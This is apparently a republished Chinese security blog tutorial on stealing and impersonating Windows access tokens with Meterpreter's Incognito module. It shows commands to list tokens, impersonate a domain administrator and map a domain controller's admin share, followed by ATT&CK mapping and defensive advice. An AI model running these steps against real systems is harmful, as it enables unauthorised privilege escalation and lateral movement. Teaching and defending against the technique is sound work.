文章总结： 本文阐述Windows后渗透中利用访问令牌冒充用户进行横向移动的技术。详细演示使用Meterpreter的Incognito模块枚举、窃取并冒充高权限账户的流程，实现在无密码情况下访问域控资源。结合MITREATT&CK框架，提出减少高权限使用、启用EDR监控及CredentialGuard等防御建议，强调降低高价值Token暴露风险的重要性。 综合评分： 89 文章分类： 渗透测试,内网渗透,红队,实战经验

窃取 Windows 访问令牌并冒充用户

原创

寰宇秘阁 寰宇秘阁

寰宇密阁

2026年3月10日 10:01 安徽

在 Windows 环境的后渗透过程中，获取明文密码并不是唯一目标。在很多真实场景中，即便无法直接拿到用户密码，攻击者依然可以通过窃取并使用 Windows 访问令牌（Token） 来冒充其他用户，进而完成横向移动或权限扩展。

本文将围绕以下几个方面展开：

• Windows Token 的基本概念
• 为什么 Token 冒充在实战中非常有价值
• 使用 Meterpreter + Incognito 窃取 Token 的流程
• 冒充高权限账户后的实际效果
• 对应的防御视角与建议

一、为什么不需要密码，也能“变成别人”？

在 Windows 中，用户登录后，系统会为其分配一个 访问令牌（Access Token）。 这个 Token 中包含了：

• 用户身份（SID）
• 用户所属的组
• 拥有的权限（Privileges）

系统并不会在每次操作时再次校验密码，而是信任这个 Token。

这意味着：

只要攻击者能够获取并使用某个用户的 Token，就可以在不知密码的情况下，以该用户身份执行操作。

二、Token 冒充的典型使用场景

Token 冒充在以下场景中尤其有价值：

• 域管理员通过远程方式启动了某个服务或任务
• 管理员没有交互式登录主机
• 系统中已经存在高权限用户的 Token
• 无法直接 dump 出明文密码（如 Credential Guard 场景）

在这种情况下，Token 冒充往往比密码攻击更隐蔽、更高效。

三、Incognito：Meterpreter 中的 Token 利器

Metasploit 的 Meterpreter 提供了一个扩展模块 Incognito，专门用于操作 Windows Token。

1. 加载 incognito 模块

在已有 Meterpreter 会话的前提下，先加载模块：

meterpreter > load incognito
Loading extension incognito...Success.

加载成功后，就可以对系统中存在的 Token 进行枚举和冒充。

四、枚举系统中的 Token

使用以下命令列出当前系统可用的 Token：

meterpreter > list_tokens -u

示例输出如下：

Delegation Tokens Available:
FILE01\Administrator
HSILAB\domain_admin
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2
...

这里重点关注两类 Token：

• Delegation Tokens（委派令牌）
• Impersonation Tokens（冒充令牌）

这两类 Token 都可以用于冒充用户身份并启动进程。

从上面的结果可以看出，一个 域管理员账户（domain_admin） 已经在该系统上运行过任务。

五、窃取并冒充目标用户的 Token

一旦发现有价值的 Token，就可以直接进行冒充。

1. 冒充指定用户的 Token

meterpreter > impersonate_token HSILAB\\domain_admin
Delegation token available
Successfully impersonated user HSILAB\domain_admin

2. 验证当前身份

meterpreter > getuid
Server username: HSILAB\domain_admin

此时，Meterpreter 中执行的所有操作，都已经是在目标用户（域管理员）的安全上下文中完成的。

六、冒充后能做什么？一个典型示例

在成功冒充高权限用户后，可以直接执行系统操作，例如启动一个命令行：

meterpreter > shell
Process 960 created.
Channel 1 created.

在 shell 中，可以访问原本无权访问的资源，例如域控的管理共享：

net use X: \\10.10.0.47\C$
The command completed successfully.

查看映射后的磁盘内容：

dir X:\

示例输出：

02/23/2018 11:06 AM <DIR> PerfLogs
04/04/2022 07:13 PM <DIR> Program Files
03/30/2022 01:59 PM <DIR> Program Files (x86)
03/30/2022 07:17 PM <DIR> Temp
04/01/2022 08:48 PM <DIR> Users
06/30/2021 10:06 PM <DIR> Windows
...

从攻击效果上看，这几乎等同于真正以域管理员身份登录系统。

七、对应的 MITRE ATT&CK 技术点

该技术在 MITRE ATT&CK 框架中通常关联以下内容：

• Token Impersonation / Theft
• 凭据访问与权限提升阶段
• 横向移动的前置条件

它强调的是：

并非所有攻击都以“窃取密码”为终点。

八、防御视角：如何降低 Token 被滥用的风险？

从防守角度，可以重点关注以下措施：

• ✅ 减少高权限账户在普通服务器上的使用
• ✅ 避免域管理员远程运行不必要的任务
• ✅ 使用“最小权限原则”分离运维账户
• ✅ 启用 EDR，监控 Token 冒充与可疑 API 调用
• ✅ 对服务账户、计划任务进行定期审计
• ✅ 使用 Credential Guard + 受限管理员模式

核心目标只有一个：

尽量减少系统中同时存在高价值 Token 的机会

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：寰宇密阁 寰宇秘阁 寰宇秘阁《窃取 Windows 访问令牌并冒充用户》